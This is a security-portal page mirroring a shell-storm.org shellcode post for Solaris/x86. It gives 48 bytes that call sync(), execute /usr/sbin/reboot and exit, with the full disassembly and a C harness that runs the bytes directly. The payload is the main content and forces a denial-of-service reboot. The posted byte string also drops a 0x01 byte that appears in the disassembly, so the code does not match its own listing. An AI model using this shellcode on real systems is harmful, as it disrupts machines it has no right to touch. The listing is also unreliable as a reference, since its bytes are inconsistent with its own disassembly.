首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2010-06-17  

/*
 Title:   Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
 Author:  Jonathan Salwan <submit AT shell-storm.org>
 Web:     http://www.shell-storm.org
 Twitter: http://twitter.com/shell_storm

 ! Database of shellcodes: http://www.shell-storm.org/shellcode/

 Date:    2010-06-07
 Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              b0 24              movb   $0x24,%al
    0x8048078:              cd 91              int    $0x91
    0x804807a:              31 c0              xorl   %eax,%eax
    0x804807c:              50                 pushl  %eax
    0x804807d:              68 62 6f 6f 74     pushl  $0x746f6f62
    0x8048082:              68 6e 2f 72 65     pushl  $0x65722f6e
    0x8048087:              68 2f 73 62 69     pushl  $0x6962732f
    0x804808c:              68 2f 75 73 72     pushl  $0x7273752f
    0x8048091:              89 e3              movl   %esp,%ebx
    0x8048093:              50                 pushl  %eax
    0x8048094:              53                 pushl  %ebx
    0x8048095:              89 e1              movl   %esp,%ecx
    0x8048097:              50                 pushl  %eax
    0x8048098:              51                 pushl  %ecx
    0x8048099:              53                 pushl  %ebx
    0x804809a:              b0 0b              movb   $0xb,%al
    0x804809c:              50                 pushl  %eax
    0x804809d:              cd 91              int    $0x91
    0x804809f:              31 db              xorl   %ebx,%ebx
    0x80480a1:              b0 01              movb   $0x1,%al
    0x80480a3:              cd 91              int    $0x91


*/

#include <stdio.h>

char sc[] = "\x31\xc0\xb0\x24\xcd\x91\x31\xc0\x50\x68"
            "\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65\x68"
            "\x2f\x73\x62\x69\x68\x2f\x75\x73\x72\x89"
            "\xe3\x50\x53\x89\xe1\x50\x51\x53\xb0\x0b"
            "\x50\xcd\x91\x31\xdb\xb0\xcd\x91";


int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(sc));
        (*(void(*)()) sc)();

return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Impact PDF Reader v2.0 for iPh
·File Sharing Wizard v1.5.0 Buf
·QuickOffice v3.1.0 for iPhone/
·Infinity 0-day Denial of Servi
·Unreal IRCD 3.2.8.1 Remote Dow
·Winplot 2010 Buffer Overflow P
·SasCam v2.6.5 Remote HTTP Serv
·Litespeed Technologies Web Ser
·AspTR EXtended CSRF Bug
·Collabtive v0.6.3 Multiple Vul
·Nakid CMS (fckeditor) Remote A
·CP3 Studio PC Ver. Dos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved